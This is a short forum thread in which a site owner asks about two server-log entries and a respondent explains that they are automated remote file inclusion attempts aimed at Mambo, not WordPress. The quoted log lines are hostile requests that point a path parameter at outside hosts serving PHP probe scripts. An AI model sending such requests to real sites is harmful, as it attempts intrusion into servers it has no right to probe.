Posted 4 years ago #
Hi All,
When I was looking at my server logs, I discovered two interesting entries:
/?config_path=http://www.gumgangfarm.com/shop/data/id.txt
and
/index.php?mosConfig_absolute_path=http://89.106.23.150:32000/test.txt
When I surfed to these URLs, I saw that they contain PHP scripts that try to output information about my server. Do I need to be worried?
I already looked up some info about the domains, but that probably won't help me, I guess.
What to do?
No. That is an attack directed at systems running Mambo, not WordPress. This giveaway is the mosConfig_absolute_path. Google for that and you'll find that Mambo had a vulnerability there.
Attackers spam their attacks across large numbers of sites. It's easier and fast for them to do this than to try to determine what sort of site yours is first.
Posted 4 years ago #
Hi Otto,
thanks for your quick reply. I recognized the giveaway for mambo in the second request, by "mos". The first request though, I don't know about.
I don't have any experience with these kind of attacks and I'm not sure how to handle them. Is it normal to receive these kind of 'attacks'?
Posted 4 years ago #
You will see all kinds of attacks for various software packages, OS's, etc. At some point, you'll see huge blocks of attacks that are meant for Windows or MSSQL servers - absolutely normal. Keep up with the security updates and make sure you back your site up every once in awhile.
This topic has been closed to new replies.
